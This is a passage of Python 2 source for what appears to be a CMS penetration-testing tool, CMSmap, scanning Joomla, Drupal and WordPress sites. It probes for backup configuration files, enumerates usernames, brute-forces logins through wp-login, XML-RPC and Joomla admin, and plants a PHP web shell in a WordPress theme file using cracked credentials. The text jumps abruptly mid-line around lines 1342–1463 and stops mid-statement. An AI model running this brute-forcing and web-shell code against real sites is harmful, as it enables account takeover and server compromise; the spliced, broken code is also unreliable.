return urllib2.HTTPHandler.do_open(self, h, req) 650 | 651 | class JooScan: 652 | # Scan Joomla site 653 | def __init__(self,url,threads): 654 | self.headers={'User-Agent':agent,} 655 | self.url = url 656 | self.queue_num = 5 657 | self.thread_num = threads 658 | self.usernames = [] 659 | self.pluginPath = "/components/" 660 | self.pluginsFound = [] 661 | self.notValidLen = [] 662 | self.notExistingCode = 404 663 | self.weakpsw = ['password', 'admin','123456','Password1'] # 5th attempt is the username 664 | self.confFiles=['','.php~','.php.txt','.php.old','.php_old','.php-old','.php.save','.php.swp','.php.swo','.php_bak','.php-bak','.php.original','.php.old','.php.orig','.php.bak','.save','.old','.bak','.orig','.original','.txt'] 665 | self.excludeEDBPlugins = ['com_banners','com_contact','com_content','com_users'] 666 | self.genChecker = GenericChecks(url) 667 | self.genChecker.NotExisitingLength() 668 | self.plugins_small = [line.strip() for line in open(os.path.join(dataPath, 'joo_plugins_small.txt'))] 669 | self.plugins = [line.strip() for line in open(os.path.join(dataPath, 'joo_plugins.txt'))] 670 | self.versions = [line.strip() for line in open(os.path.join(dataPath, 'joo_versions.txt'))] 671 | searcher.cmstype = "Joomla" 672 | 673 | def Joorun(self): 674 | msg = "CMS Detection: Joomla"; report.info(msg) 675 | self.JooNotExisitingCode() 676 | self.JooVersion() 677 | self.JooTemplate() 678 | self.JooConfigFiles() 679 | self.JooFeed() 680 | bruter.usrlist = self.usernames 681 | bruter.pswlist = self.weakpsw 682 | bruter.Joorun() 683 | self.genChecker.AutocompleteOff('/administrator/index.php') 684 | self.JooDefaultFiles() 685 | if FullScan : self.genChecker.CommonFiles() 686 | self.JooModulesIndex() 687 | self.JooComponents() 688 | if not FullScan : searcher.exclude = self.excludeEDBPlugins 689 | searcher.query = self.pluginsFound; searcher.Plugins() 690 | self.JooDirsListing() 691 | 692 | def JooVersion(self): 693 | try: 694 | htmltext = urllib2.urlopen(self.url+'/joomla.xml').read() 695 | regex = '(.+?)' 696 | pattern = re.compile(regex) 697 | version = re.findall(pattern,htmltext) 698 | if version: 699 | msg = "Joomla Version: "+version[0]; report.info(msg) 700 | if version[0] in self.versions : 701 | for ver in self.versions: 702 | searcher.query = ver; searcher.Core() 703 | if ver == version[0]: 704 | break 705 | except urllib2.HTTPError, e: 706 | #print e.code 707 | pass 708 | 709 | def JooTemplate(self): 710 | try: 711 | htmltext = urllib2.urlopen(self.url+'/index.php').read() 712 | WebTemplate = re.findall("/templates/(.+?)/", htmltext,re.IGNORECASE) 713 | htmltext = urllib2.urlopen(self.url+'/administrator/index.php').read() 714 | AdminTemplate = re.findall("/administrator/templates/(.+?)/", htmltext,re.IGNORECASE) 715 | if WebTemplate[0] : 716 | msg = "Joomla Website Template: "+WebTemplate[0]; report.info(msg) 717 | searcher.query = WebTemplate[0]; searcher.Themes() 718 | if AdminTemplate[0] : 719 | msg = "Joomla Administrator Template: "+AdminTemplate[0]; report.info(msg) 720 | searcher.query = AdminTemplate[0]; searcher.Themes() 721 | except urllib2.HTTPError, e: 722 | #print e.code 723 | pass 724 | 725 | def JooConfigFiles(self): 726 | for file in self.confFiles: 727 | req = urllib2.Request(self.url+"/configuration"+file) 728 | try: 729 | htmltext = urllib2.urlopen(req).read() 730 | if len(htmltext) not in self.notValidLen: 731 | msg = "Configuration File Found: " +self.url+"/configuration"+file; report.high(msg) 732 | except urllib2.HTTPError, e: 733 | #print e.code 734 | pass 735 | 736 | def JooDefaultFiles(self): 737 | self.defFilesFound = [] 738 | msg = "Joomla Default Files: "; report.message(msg) 739 | # Check for default files 740 | self.defFiles=['/README.txt', 741 | '/htaccess.txt', 742 | '/administrator/templates/hathor/LICENSE.txt', 743 | '/web.config.txt', 744 | '/joomla.xml', 745 | '/robots.txt.dist', 746 | '/LICENSE.txt', 747 | '/media/jui/fonts/icomoon-license.txt', 748 | '/media/editors/tinymce/jscripts/tiny_mce/license.txt', 749 | '/media/editors/tinymce/jscripts/tiny_mce/plugins/style/readme.txt', 750 | '/libraries/idna_convert/ReadMe.txt', 751 | '/libraries/simplepie/README.txt', 752 | '/libraries/simplepie/LICENSE.txt', 753 | '/libraries/simplepie/idn/ReadMe.txt', 754 | ] 755 | for file in self.defFiles: 756 | req = urllib2.Request(self.url+file,None,self.headers) 757 | try: 758 | htmltext = urllib2.urlopen(req).read() 759 | if len(htmltext) not in self.notValidLen: 760 | self.defFilesFound.append(self.url+file) 761 | except urllib2.HTTPError, e: 762 | #print e.code 763 | pass 764 | for file in self.defFilesFound: 765 | msg = file; report.info(msg) 766 | 767 | def JooFeed(self): 768 | try: 769 | htmltext = urllib2.urlopen(self.url+'/?format=feed').read() 770 | jooUsers = re.findall("(.+?) \((.+?)\)", htmltext,re.IGNORECASE) 771 | if jooUsers: 772 | msg = "Enumerating Joomla Usernames via \"Feed\" ..."; report.message(msg) 773 | jooUsers = sorted(set(jooUsers)) 774 | for user in jooUsers : 775 | self.usernames.append(user[1]) 776 | msg = user[1]+" "+user[0]; report.info(msg) 777 | except urllib2.HTTPError, e: 778 | #print e.code 779 | pass 780 | 781 | def JooDirsListing(self): 782 | msg = "Checking for Directory Listing Enabled ..."; report.info(msg) 783 | report.WriteTextFile(msg) 784 | GenericChecks(self.url).DirectoryListing('/administrator/') 785 | GenericChecks(self.url).DirectoryListing('/bin/') 786 | GenericChecks(self.url).DirectoryListing('/cache/') 787 | GenericChecks(self.url).DirectoryListing('/cli/') 788 | GenericChecks(self.url).DirectoryListing('/components/') 789 | GenericChecks(self.url).DirectoryListing('/images/') 790 | GenericChecks(self.url).DirectoryListing('/includes/') 791 | GenericChecks(self.url).DirectoryListing('/language/') 792 | GenericChecks(self.url).DirectoryListing('/layouts/') 793 | GenericChecks(self.url).DirectoryListing('/libraries/') 794 | GenericChecks(self.url).DirectoryListing('/media/') 795 | GenericChecks(self.url).DirectoryListing('/modules/') 796 | GenericChecks(self.url).DirectoryListing('/plugins/') 797 | GenericChecks(self.url).DirectoryListing('/templates/') 798 | GenericChecks(self.url).DirectoryListing('/tmp/') 799 | for plugin in self.pluginsFound: 800 | GenericChecks(self.url).DirectoryListing('/components/'+plugin) 801 | 802 | def JooNotExisitingCode(self): 803 | req = urllib2.Request(self.url+self.pluginPath+"/N0WayThatYouAreHere"+time.strftime('%d%m%H%M%S')+"/",None, self.headers) 804 | noRedirOpener = urllib2.build_opener(NoRedirects()) 805 | try: 806 | htmltext = noRedirOpener.open(req).read() 807 | self.notValidLen.append(len(htmltext)) 808 | except urllib2.HTTPError, e: 809 | #print e.code 810 | self.notValidLen.append(len(e.read())) 811 | self.notExistingCode = e.code 812 | 813 | def JooModulesIndex(self): 814 | try: 815 | req = urllib2.Request(self.url,None,self.headers) 816 | htmltext = urllib2.urlopen(req).read() 817 | self.pluginsFound = re.findall(re.compile('/modules/(.+?)/'),htmltext) 818 | self.pluginsFound = sorted(set(self.pluginsFound)) 819 | except urllib2.HTTPError, e: 820 | #print e.code 821 | pass 822 | 823 | def JooComponents(self): 824 | msg = "Searching Joomla Components ..."; report.message(msg) 825 | if not FullScan : self.plugins = self.plugins_small 826 | # Create Code 827 | q = Queue.Queue(self.queue_num) 828 | # Spawn all threads into code 829 | for u in range(self.thread_num): 830 | t = ThreadScanner(self.url,self.pluginPath,"/",self.pluginsFound,self.notExistingCode,self.notExistingCode,q) 831 | t.daemon = True 832 | t.start() 833 | # Add all plugins to the queue 834 | for r,i in enumerate(self.plugins): 835 | q.put(i) 836 | sys.stdout.write("\r"+str(100*int(r+1)/len(self.plugins))+"%") 837 | sys.stdout.flush() 838 | q.join() 839 | sys.stdout.write("\r") 840 | 841 | class DruScan: 842 | # Scan Drupal site 843 | def __init__(self,url,netloc,threads): 844 | self.headers={'User-Agent':agent,} 845 | self.url = url 846 | self.queue_num = 5 847 | self.thread_num = threads 848 | self.notExistingCode = 404 849 | self.notValidLen = [] 850 | self.netloc = netloc 851 | self.pluginPath = "/modules/" 852 | self.forgottenPsw = "/?q=user/password" 853 | self.weakpsw = ['password', 'admin','123456','Password1'] # 5th attempt is the username 854 | self.confFiles=['','.php~','.php.txt','.php.old','.php_old','.php-old','.php.save','.php.swp','.php.swo','.php_bak','.php-bak','.php.original','.php.old','.php.orig','.php.bak','.save','.old','.bak','.orig','.original','.txt'] 855 | self.usernames = [] 856 | self.pluginsFound = [] 857 | self.genChecker = GenericChecks(url) 858 | self.genChecker.NotExisitingLength() 859 | self.plugins_small = [line.strip() for line in open(os.path.join(dataPath, 'dru_plugins_small.txt'))] 860 | self.plugins = [line.strip() for line in open(os.path.join(dataPath, 'dru_plugins.txt'))] 861 | self.versions = [line.strip() for line in open(os.path.join(dataPath, 'dru_versions.txt'))] 862 | searcher.cmstype = "Drupal" 863 | 864 | def Drurun(self): 865 | msg = "CMS Detection: Drupal"; report.info(msg) 866 | self.DruNotExisitingCode() 867 | self.DruVersion() 868 | self.DruCurrentTheme() 869 | self.DruConfigFiles() 870 | self.DruViews() 871 | self.DruBlog() 872 | bruter.usrlist = self.usernames 873 | bruter.pswlist = self.weakpsw 874 | bruter.Drurun() 875 | self.genChecker.AutocompleteOff('/?q=user') 876 | self.DruDefaultFiles() 877 | if FullScan : self.genChecker.CommonFiles() 878 | self.DruForgottenPassword() 879 | self.DruModulesIndex() 880 | self.DruModules() 881 | searcher.query = self.pluginsFound; searcher.Plugins() 882 | self.DruDirsListing() 883 | 884 | def DruVersion(self): 885 | try: 886 | htmltext = urllib2.urlopen(self.url+'/CHANGELOG.txt').read() 887 | regex = 'Drupal (\d+\.\d+),' 888 | pattern = re.compile(regex) 889 | version = re.findall(pattern,htmltext) 890 | if version: 891 | self.DruVersion = version[0] 892 | msg = "Drupal Version: "+version[0]; report.info(msg) 893 | self.DruCore() 894 | if version[0] in self.versions : 895 | for ver in self.versions: 896 | searcher.query = ver; searcher.Core() 897 | if ver == version[0]: 898 | break 899 | except urllib2.HTTPError, e: 900 | #print e.code 901 | pass 902 | 903 | def DruCore(self): 904 | if LooseVersion("7") <= LooseVersion(str(self.DruVersion)) <= LooseVersion("7.31"): 905 | msg = "Drupal Vulnerable to SA-CORE-2014-005"; report.high(msg) 906 | 907 | def DruCurrentTheme(self): 908 | try: 909 | htmltext = urllib2.urlopen(self.url+'/index.php').read() 910 | DruTheme = re.findall("/themes/(.+?)/", htmltext,re.IGNORECASE) 911 | if DruTheme : 912 | self.Drutheme = DruTheme[0] 913 | msg = "Drupal Theme: "+ self.Drutheme ; report.info(msg) 914 | searcher.query = [self.Drutheme] ; searcher.Themes() 915 | return DruTheme[0] 916 | except urllib2.HTTPError, e: 917 | #print e.code 918 | pass 919 | 920 | def DruConfigFiles(self): 921 | for file in self.confFiles: 922 | req = urllib2.Request(self.url+"/sites/"+self.netloc+"/settings"+file) 923 | try: 924 | htmltext = urllib2.urlopen(req).read() 925 | if len(htmltext) not in self.notValidLen: 926 | msg = "Configuration File Found: " +self.url+"/sites/"+self.netloc+"/settings"+file; report.high(msg) 927 | except urllib2.HTTPError, e: 928 | #print e.code 929 | pass 930 | 931 | def DruDefaultFiles(self): 932 | self.defFilesFound = [] 933 | msg = "Drupal Default Files: "; report.message(msg) 934 | report.WriteTextFile(msg) 935 | self.defFiles=['/README.txt', 936 | '/INSTALL.mysql.txt', 937 | '/MAINTAINERS.txt', 938 | '/profiles/standard/translations/README.txt', 939 | '/profiles/minimal/translations/README.txt', 940 | '/INSTALL.pgsql.txt', 941 | '/UPGRADE.txt', 942 | '/CHANGELOG.txt', 943 | '/INSTALL.sqlite.txt', 944 | '/LICENSE.txt', 945 | '/INSTALL.txt', 946 | '/COPYRIGHT.txt', 947 | '/web.config', 948 | '/modules/README.txt', 949 | '/modules/simpletest/files/README.txt', 950 | '/modules/simpletest/files/javascript-1.txt', 951 | '/modules/simpletest/files/php-1.txt', 952 | '/modules/simpletest/files/sql-1.txt', 953 | '/modules/simpletest/files/html-1.txt', 954 | '/modules/simpletest/tests/common_test_info.txt', 955 | '/modules/filter/tests/filter.url-output.txt', 956 | '/modules/filter/tests/filter.url-input.txt', 957 | '/modules/search/tests/UnicodeTest.txt', 958 | '/themes/README.txt', 959 | '/themes/stark/README.txt', 960 | '/sites/README.txt', 961 | '/sites/all/modules/README.txt', 962 | '/sites/all/themes/README.txt', 963 | '/modules/simpletest/files/html-2.html', 964 | '/modules/color/preview.html', 965 | '/themes/bartik/color/preview.html' 966 | ] 967 | for file in self.defFiles: 968 | req = urllib2.Request(self.url+file,None,self.headers) 969 | try: 970 | htmltext = urllib2.urlopen(req).read() 971 | if len(htmltext) not in self.notValidLen: 972 | self.defFilesFound.append(self.url+file) 973 | except urllib2.HTTPError, e: 974 | #print e.code 975 | pass 976 | for file in self.defFilesFound: 977 | msg = file; report.info(msg) 978 | 979 | def DruViews(self): 980 | self.views = "/?q=admin/views/ajax/autocomplete/user/" 981 | self.alphanum = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") 982 | usernames = [] 983 | msg = "Enumerating Drupal Usernames via \"Views\" Module..."; report.message(msg) 984 | req = urllib2.Request(self.url+"/?q=admin/views/ajax/autocomplete/user/NotExisingUser1234!",None, self.headers) 985 | noRedirOpener = urllib2.build_opener(NoRedirects()) 986 | try: 987 | htmltext = noRedirOpener.open(req).read() 988 | #If NotExisingUser1234 returns [], then enumerate users 989 | if htmltext == '[]': 990 | for letter in self.alphanum: 991 | htmltext = urllib2.urlopen(self.url+self.views+letter).read() 992 | regex = '"(.+?)"' 993 | pattern = re.compile(regex) 994 | usernames = usernames + re.findall(pattern,htmltext) 995 | usernames = sorted(set(usernames)) 996 | self.usernames = usernames 997 | for user in usernames: 998 | msg = user; report.info(msg) 999 | except urllib2.HTTPError, e: 1000 | pass 1001 | 1002 | def DruBlog(self): 1003 | self.blog = "/?q=blog/" 1004 | usernames = [] 1005 | try: 1006 | urllib2.urlopen(self.url+self.blog) 1007 | msg = "Enumerating Drupal Usernames via \"Blog\" Module..."; report.message(msg) 1008 | report.WriteTextFile(msg) 1009 | for blognum in range (1,50): 1010 | try: 1011 | htmltext = urllib2.urlopen(self.url+self.blog+str(blognum)).read() 1012 | regex = "(.+?)\'s" 1013 | pattern = re.compile(regex) 1014 | user = re.findall(pattern,htmltext) 1015 | usernames = usernames + user 1016 | if user : msg = user[0] ; report.info(msg) 1017 | except urllib2.HTTPError, e: 1018 | pass 1019 | usernames = sorted(set(usernames)) 1020 | self.usernames = usernames 1021 | except urllib2.HTTPError, e: 1022 | #print e.code 1023 | pass 1024 | 1025 | def DruForgottenPassword(self): 1026 | # Username Enumeration via Forgotten Password 1027 | query_args = {"name": "N0t3xist!1234" ,"form_id":"user_pass"} 1028 | data = urllib.urlencode(query_args) 1029 | # HTTP POST Request 1030 | req = urllib2.Request(self.url+self.forgottenPsw, data) 1031 | #print "[*] Trying Credentials: "+user+" "+pwd 1032 | try: 1033 | htmltext = urllib2.urlopen(req).read() 1034 | if re.findall(re.compile('Sorry,.*N0t3xist!1234.*is not recognized'),htmltext): 1035 | msg = "Forgotten Password Allows Username Enumeration: "+self.url+self.forgottenPsw; report.info(msg) 1036 | report.WriteTextFile(msg) 1037 | except urllib2.HTTPError, e: 1038 | #print e.code 1039 | pass 1040 | 1041 | def DruDirsListing(self): 1042 | msg = "Checking for Directory Listing Enabled ..."; report.info(msg) 1043 | report.WriteTextFile(msg) 1044 | GenericChecks(self.url).DirectoryListing('/includes/') 1045 | GenericChecks(self.url).DirectoryListing('/misc/') 1046 | GenericChecks(self.url).DirectoryListing('/modules/') 1047 | GenericChecks(self.url).DirectoryListing('/profiles/') 1048 | GenericChecks(self.url).DirectoryListing('/scripts/') 1049 | GenericChecks(self.url).DirectoryListing('/sites/') 1050 | GenericChecks(self.url).DirectoryListing('/includes/') 1051 | GenericChecks(self.url).DirectoryListing('/themes/') 1052 | for plugin in self.pluginsFound: 1053 | GenericChecks(self.url).DirectoryListing('/modules/'+plugin) 1054 | 1055 | def DruNotExisitingCode(self): 1056 | req = urllib2.Request(self.url+self.pluginPath+"/N0WayThatYouAreHere"+time.strftime('%d%m%H%M%S')+"/",None, self.headers) 1057 | noRedirOpener = urllib2.build_opener(NoRedirects()) 1058 | try: 1059 | htmltext = noRedirOpener.open(req).read() 1060 | self.notValidLen.append(len(htmltext)) 1061 | except urllib2.HTTPError, e: 1062 | #print e.code 1063 | self.notValidLen.append(len(e.read())) 1064 | self.notExistingCode = e.code 1065 | 1066 | def DruModulesIndex(self): 1067 | try: 1068 | req = urllib2.Request(self.url,None,self.headers) 1069 | htmltext = urllib2.urlopen(req).read() 1070 | self.pluginsFound = re.findall(re.compile('/modules/(.+?)/'),htmltext) 1071 | self.pluginsFound = sorted(set(self.pluginsFound)) 1072 | except urllib2.HTTPError, e: 1073 | #print e.code 1074 | pass 1075 | 1076 | def DruModules(self): 1077 | msg = "Search Drupal Modules ..."; report.message(msg) 1078 | if not FullScan : self.plugins = self.plugins_small 1079 | # Create Code 1080 | q = Queue.Queue(self.queue_num) 1081 | # Spawn all threads into code 1082 | for u in range(self.thread_num): 1083 | t = ThreadScanner(self.url,self.pluginPath,"/",self.pluginsFound,self.notExistingCode,self.notValidLen,q) 1084 | t.daemon = True 1085 | t.start() 1086 | # Add all plugins to the queue 1087 | for r,i in enumerate(self.plugins): 1088 | q.put(i) 1089 | sys.stdout.write("\r"+str(100*int(r+1)/len(self.plugins))+"%") 1090 | sys.stdout.flush() 1091 | q.join() 1092 | sys.stdout.write("\r") 1093 | 1094 | class ExploitDBSearch: 1095 | def __init__(self): 1096 | self.url = None 1097 | self.query = None 1098 | self.cmstype = None 1099 | self.headers={'User-Agent':agent,} 1100 | self.flagged = [] 1101 | self.exclude = [] 1102 | 1103 | def Core(self): 1104 | if self.query is not None: 1105 | # Get this value from their classes 1106 | msg = "Searching Core Vulnerabilities for version "+self.query ; report.verbose(msg) 1107 | htmltext = urllib2.urlopen("http://www.exploit-db.com/search/?action=search&filter_description="+self.cmstype+"+"+self.query).read() 1108 | regex = '/download/(.+?)/">' 1109 | pattern = re.compile(regex) 1110 | ExploitID = re.findall(pattern,htmltext) 1111 | for Eid in ExploitID: 1112 | # If Eid hasn't been already found, then go on 1113 | if Eid not in self.flagged: 1114 | req = urllib2.Request("http://www.exploit-db.com/exploits/"+str(Eid)+"/",None,self.headers) 1115 | htmltext = urllib2.urlopen(req).read() 1116 | self.title = re.findall(re.compile('<title>(.+?)'),htmltext) 1117 | self.date = re.findall(re.compile('>Published: (.+?)'),htmltext) 1118 | self.verified = 'Yes' 1119 | if re.search(re.compile('Not Verified'),htmltext): self.verified = 'No ' 1120 | if self.title and self.date: 1121 | msg = " EDB-ID: "+Eid+" Date: "+self.date[0] +" Verified: "+self.verified+" Title: "+ self.title[0].replace('>', '>').replace('<','<').replace('&','&') 1122 | report.medium(msg) 1123 | else: 1124 | msg = " EDB-ID: "+Eid; report.medium(msg) 1125 | self.flagged = self.flagged + ExploitID 1126 | self.flagged = sorted(set(self.flagged)) 1127 | else: 1128 | pass 1129 | 1130 | def Plugins(self): 1131 | if self.query is not None: 1132 | msg = "Searching Vulnerable Plugins from ExploitDB website ..." ; report.verbose(msg) 1133 | for plugin in self.query: 1134 | msg = plugin; report.info(msg) 1135 | if not NoExploitdb : 1136 | htmltext = urllib2.urlopen("http://www.exploit-db.com/search/?action=search&filter_description="+self.cmstype+"&filter_exploit_text="+plugin).read() 1137 | regex = '/download/(.+?)/">' 1138 | pattern = re.compile(regex) 1139 | ExploitID = re.findall(pattern,htmltext) 1140 | if plugin not in self.exclude: 1141 | for Eid in ExploitID: 1142 | # If Eid hasn't been already found, then go on 1143 | if Eid not in self.flagged: 1144 | req = urllib2.Request("http://www.exploit-db.com/exploits/"+str(Eid)+"/",None,self.headers) 1145 | htmltext = urllib2.urlopen(req).read() 1146 | self.title = re.findall(re.compile('(.+?)'),htmltext) 1147 | self.date = re.findall(re.compile('>Published: (.+?)'),htmltext) 1148 | self.verified = 'Yes' 1149 | if re.search(re.compile('Not Verified'),htmltext): self.verified = 'No ' 1150 | if self.title and self.date: 1151 | msg = " EDB-ID: "+Eid+" Date: "+self.date[0] +" Verified: "+self.verified+" Title: "+ self.title[0].replace('>', '>').replace('<','<').replace('&','&') 1152 | report.medium(msg) 1153 | else: 1154 | msg = " EDB-ID: "+Eid; report.medium(msg) 1155 | self.flagged = self.flagged + ExploitID 1156 | self.flagged = sorted(set(self.flagged)) 1157 | else: 1158 | pass 1159 | 1160 | def Themes(self): 1161 | if self.query is not None: 1162 | msg = "Searching Vulnerable Theme from ExploitDB website ..."; report.verbose(msg) 1163 | for theme in self.query : 1164 | htmltext = urllib2.urlopen("http://www.exploit-db.com/search/?action=search&filter_description="+self.cmstype+"&filter_exploit_text="+theme).read() 1165 | regex = '/download/(.+?)/">' 1166 | pattern = re.compile(regex) 1167 | ExploitID = re.findall(pattern,htmltext) 1168 | for Eid in ExploitID: 1169 | # If Eid hasn't been already found, then go on 1170 | if Eid not in self.flagged: 1171 | req = urllib2.Request("http://www.exploit-db.com/exploits/"+str(Eid)+"/",None,self.headers) 1172 | htmltext = urllib2.urlopen(req).read() 1173 | self.title = re.findall(re.compile('(.+?)'),htmltext) 1174 | self.date = re.findall(re.compile('>Published: (.+?)'),htmltext) 1175 | self.verified = 'Yes' 1176 | if re.search(re.compile('Not Verified'),htmltext): self.verified = 'No ' 1177 | if self.title and self.date: 1178 | msg = " EDB-ID: "+Eid+" Date: "+self.date[0] +" Verified: "+self.verified+" Title: "+ self.title[0].replace('>', '>').replace('<','<').replace('&','&') 1179 | report.medium(msg) 1180 | else: 1181 | msg = " EDB-ID: "+Eid; report.medium(msg) 1182 | self.flagged = self.flagged + ExploitID 1183 | self.flagged = sorted(set(self.flagged)) 1184 | else: 1185 | pass 1186 | 1187 | class NoRedirects(urllib2.HTTPRedirectHandler): 1188 | """Redirect handler that simply raises a Redirect().""" 1189 | def redirect_request(self, req, fp, code, msg, headers, newurl): 1190 | RedirError = urllib2.HTTPError(req.get_full_url(), code, msg, headers, fp) 1191 | RedirError.status = code 1192 | raise RedirError 1193 | 1194 | class ThreadScanner(threading.Thread): 1195 | # self.url = http://mysite.com 1196 | # pluginPath = /wp-content 1197 | # pluginPathEnd = / 1198 | # pluginFound = wptest 1199 | def __init__(self,url,pluginPath,pluginPathEnd,pluginsFound,notExistingCode,notValidLen,q): 1200 | threading.Thread.__init__ (self) 1201 | self.url = url 1202 | self.q = q 1203 | self.pluginPath = pluginPath 1204 | self.pluginsFound = pluginsFound 1205 | self.pluginPathEnd = pluginPathEnd 1206 | self.notExistingCode = notExistingCode 1207 | self.notValidLen = notValidLen 1208 | self.headers={'User-Agent':agent,'Accept-Encoding': None,} 1209 | 1210 | def run(self): 1211 | while True: 1212 | # Get plugin from plugin queue 1213 | plugin = self.q.get() 1214 | req = urllib2.Request(self.url+self.pluginPath+plugin+self.pluginPathEnd,None,self.headers) 1215 | noRedirOpener = urllib2.build_opener(NoRedirects()) 1216 | try: 1217 | noRedirOpener.open(req); self.pluginsFound.append(plugin) 1218 | except urllib2.HTTPError, e: 1219 | if e.code != self.notExistingCode and len(e.read()) not in self.notValidLen : self.pluginsFound.append(plugin) 1220 | except urllib2.URLError, e: 1221 | msg = "Thread Error: If this error persists, reduce number of threads"; print report.info(msg) 1222 | self.q.task_done() 1223 | 1224 | class BruteForcer: 1225 | def __init__(self): 1226 | self.headers={'User-Agent':agent,} 1227 | self.force = None 1228 | self.wpnoxmlrpc = True 1229 | self.url = None 1230 | self.usrlist = None 1231 | self.pswlist = None 1232 | self.WPValidCredentials = [] 1233 | 1234 | def Start(self): 1235 | if type(self.usrlist) is str : 1236 | try: 1237 | self.usrlist = [line.strip() for line in open(self.usrlist)] 1238 | except IOError: 1239 | self.usrlist = [self.usrlist] 1240 | if type(self.pswlist) is str : 1241 | try: 1242 | self.pswlist = [line.strip() for line in open(self.pswlist)] 1243 | except IOError: 1244 | self.pswlist = [self.pswlist] 1245 | 1246 | if self.force == 'W': 1247 | msg = "Wordpress Brute Forcing Attack Started"; report.message(msg) 1248 | if self.wpnoxmlrpc: 1249 | self.WPXMLRPC_brute() 1250 | else: 1251 | self.WPrun() 1252 | elif self.force == 'J': 1253 | msg = "Joomla Brute Forcing Attack Started"; report.message(msg) 1254 | self.Joorun() 1255 | elif self.force == 'D': 1256 | msg = "Drupal Brute Forcing Attack Started"; report.message(msg) 1257 | self.Drurun() 1258 | else: 1259 | msg = "Not Valid Option Provided: use (W)ordpress, (J)oomla, (D)rupal"; report.error(msg) 1260 | sys.exit() 1261 | 1262 | def WPXMLRPC_brute(self): 1263 | msg = "Starting XML-RPC Brute Forcing"; report.verbose(msg) 1264 | for user in self.usrlist: 1265 | for pwd in self.pswlist: 1266 | self.headers['Content-Type'] ='text/xml' 1267 | self.postdata = ('wp.getUsersBlogs' 1268 | ''+user+'' 1269 | ''+pwd+'') 1270 | msg = "Trying Credentials: "+user+" "+pwd; report.verbose(msg) 1271 | try: 1272 | req = urllib2.Request(self.url+'/xmlrpc.php',self.postdata,self.headers) 1273 | opener = urllib2.build_opener(MyHandler()) 1274 | htmltext = opener.open(req).read() 1275 | if re.search('isAdmin0',htmltext): 1276 | msg = "Valid Credentials: "+user+" "+pwd; report.high(msg) 1277 | self.WPValidCredentials.append([user,pwd]) 1278 | elif re.search('isAdmin1',htmltext): 1279 | msg = "Valid ADMIN Credentials: "+user+" "+pwd; report.high(msg) 1280 | self.WPValidCredentials.append([user,pwd]) 1281 | except urllib2.HTTPError, e: 1282 | print e.code 1283 | pass 1284 | # Try to upload a web shell with the discovered credentials 1285 | for WPCredential in self.WPValidCredentials : 1286 | msg = "Valid credentials: "+WPCredential[0]+" "+WPCredential[1]+" . Do you want to try uploading a shell?"; report.high(msg) 1287 | msg = "(If you are not admin, you won't be able to)"; report.message(msg) 1288 | if raw_input("[y/N]: ").lower().startswith('y'): 1289 | PostExploit(self.url).WPShell(WPCredential[0], WPCredential[1]) 1290 | 1291 | def WPrun(self): 1292 | self.wplogin = "/wp-login.php" 1293 | usersFound = [] 1294 | for user in self.usrlist: 1295 | cookieJar = cookielib.CookieJar() 1296 | cookieHandler = urllib2.HTTPCookieProcessor(cookieJar) 1297 | opener = urllib2.build_opener(cookieHandler) 1298 | opener.addheaders = [('User-agent', agent)] 1299 | cookieJar.clear() 1300 | self.pswlist.append(user) # try username as password 1301 | for pwd in self.pswlist: 1302 | query_args = {"log": user ,"pwd": pwd, "wp-submit":"Log+In"} 1303 | data = urllib.urlencode(query_args) 1304 | msg = "Trying Credentials: "+user+" "+pwd; report.verbose(msg) 1305 | try: 1306 | # HTTP POST Request 1307 | htmltext = opener.open(self.url+self.wplogin, data).read() 1308 | if re.search('ERROR: Invalid username',htmltext): 1309 | msg = "Invalid Username: "+user; report.message(msg) 1310 | break 1311 | elif re.search('username (.+?) is incorrect.',htmltext): 1312 | usersFound.append(user) 1313 | elif re.search('ERROR.*block.*',htmltext,re.IGNORECASE): 1314 | msg = "Account Lockout Enabled: Your IP address has been temporary blocked. Try it later or from a different IP address"; report.error(msg) 1315 | return 1316 | elif re.search('dashboard',htmltext,re.IGNORECASE): 1317 | msg = "Valid Credentials: "+user+" "+pwd; report.high(msg) 1318 | self.WPValidCredentials.append([user,pwd]) 1319 | except urllib2.HTTPError, e: 1320 | #print e.code 1321 | pass 1322 | self.pswlist.pop() # remove user 1323 | # Try to upload a web shell with the discovered credentials 1324 | for WPCredential in self.WPValidCredentials : 1325 | msg = "Valid credentials: "+WPCredential[0]+" "+WPCredential[1]+" . Do you want to try uploading a shell?"; report.high(msg) 1326 | msg = "(If you are not admin, you won't be able to)"; report.message(msg) 1327 | if raw_input("[y/N]: ").lower().startswith('y'): 1328 | PostExploit(self.url).WPShell(WPCredential[0], WPCredential[1]) 1329 | 1330 | def Joorun(self): 1331 | # It manages token and Cookies 1332 | self.joologin = "/administrator/index.php" 1333 | self.JooValidCredentials = [] 1334 | for user in self.usrlist: 1335 | cookieJar = cookielib.CookieJar() 1336 | cookieHandler = urllib2.HTTPCookieProcessor(cookieJar) 1337 | opener = urllib2.build_opener(cookieHandler) 1338 | opener.addheaders = [('User-agent',agent)] 1339 | cookieJar.clear() 1340 | # Get Token and Session Cookie 1341 | htmltext = opener.open(self.url+self.joologin).read() 1342 | reg = re.compile('(.+?)',htmltext,re.S) 1463 | 1464 | msg = "Creating a theme page with a PHP shell on the target website ..."; report.verbose(msg) 1465 | self.newcontent = self.shell+self.phpCode[0].decode('utf8').replace('&', '&').replace('<', '<').replace('>', '>').replace('"', '"').replace("'", "'") 1466 | 1467 | query_args = {"_wpnonce": self.wpnonce[0],"newcontent": self.newcontent,"action":"update","file":tempPage+".php","theme":self.theme,"submit":"Update+File"} 1468 | data = urllib.urlencode(query_args) 1469 | 1470 | msg = "Updating a new theme page with a PHP shell on the target website ..."; report.message(msg) 1471 | opener.open(self.url+"/wp-admin/theme-editor.php",data).read() 1472 | 1473 | htmltext = urllib.urlopen(self.url+"/wp-content/themes/"+self.theme+"/"+tempPage+".php?c=id").read() 1474 | if re.search('uid=\d+\(.+?\) gid=\d+\(.+?\) groups=\d+\(.+?\)', htmltext) : 1475 | msg = "Web shell Found: " + self.url+"/wp-content/themes/"+self.theme+"/"+tempPage+".php?c=id"; report.high(msg) 1476 | msg = "$ id"; report.high(msg) 1477 | msg = htmltext; report.high(msg) 1478 | # shell found then exit 1479 | sys.exit() 1480 | except urllib2.HTTPError, e: 1481 | #print e.code 1482 | pass 1483 | 1484 | def JooShell(self,user,password): 1485 | self.joologin = "/administrator/index.php" 1486 | self.jooupload = "/administrator/index.php?option=com_installer&view=install" 1487 | self.jooThemePage = "/administrator/index.php?option=com_templates" 1488 | # Set cookies 1489 | cookieJar 